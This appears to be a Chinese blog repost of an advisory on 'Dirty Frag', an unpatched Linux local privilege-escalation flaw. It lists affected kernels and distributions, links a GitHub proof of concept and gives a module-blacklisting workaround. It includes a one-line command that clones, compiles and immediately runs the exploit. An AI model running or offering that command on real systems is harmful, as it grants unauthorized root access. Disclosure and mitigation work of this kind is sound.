影响巨大!Linux 提权大洞速速复现!!!暂无补

https://mp.weixin.qq.com/s/P_Mij-46UM97QDzYbpMaOw

截至今天(2026-05-08),正式的官方补丁和 CVE 编号都还没有。

Dirty Frag:通用 Linux 本地提权漏洞

Dirty Frag 与 脏管道(Dirty Pipe)、Copy Fail 属于同一系列漏洞大类。其为确定性逻辑漏洞,不依赖时间竞争窗口、无需竞态条件;漏洞利用失败时不会触发内核崩溃,且整体利用成功率极高。

复现

POC地址

https://github.com/V4bel/dirtyfrag

复现

复制代码
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

受影响版本

xfrm-ESP 页缓存写入漏洞:影响内核提交 cac2661c53f3(2017-01-17) 至今的所有上游内核版本

RxRPC 页缓存写入漏洞:影响内核提交 2dc334f1a63a(2023 年 6 月) 至今的所有上游内核版本

简言之,该漏洞整体影响周期长达约 9 年。

已在以下主流发行版版本中实测可利用:

Ubuntu 24.04.4:6.17.0-23-generic

RHEL 10.1:6.12.0-124.49.1.el10_1.x86_64

openSUSE Tumbleweed:7.0.2-1-default

CentOS Stream 10:6.12.0-224.el10.x86_64

AlmaLinux 10:6.12.0-124.52.3.el10_1.x86_64

Fedora 44:6.19.14-300.fc44.x86_64

......

因负责任的漏洞披露流程及保密协议已提前失效,目前所有 Linux 发行版均无官方补丁。可执行以下命令,禁用存在漏洞的内核模块做临时防护:

复制代码
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"

影响巨大!

参考地址:

https://github.com/V4bel/dirtyfrag

相关推荐
阿里云大数据AI技术16 分钟前
阿里云 EMR AI 助手正式发布:从问答工具到全栈智能运维助手
运维·人工智能
你好潘先生6 小时前
别再记命令了,用 yeero do 说句人话就能跑脚本,而且不烧 token
服务器·python·命令行
orion5718 小时前
Missing Semester Class1:course overview and introduction of shell
linux
SkyWalking中文站1 天前
认识 Horizon UI · 6/17:Trace 探索器
运维·监控·自动化运维
用户120487221611 天前
Linux驱动编译与加载
linux·嵌入式
程序员老赵1 天前
服务器文件不想 SFTP 上传?Docker 跑个 File Browser,浏览器就能管理
服务器·docker·开源
火车叼位1 天前
写给初级开发者:SSL、SSH、HTTPS 与证书体系全解析
运维
vivo互联网技术1 天前
从 10 分钟到 1 秒:ES 深度分页任意跳页的三轮优化实战
服务器·数据库·redis·elasticsearch·深度分页
用户805533698031 天前
Input 子系统架构:Core、Handler、Driver 三层是怎么协作的
linux·嵌入式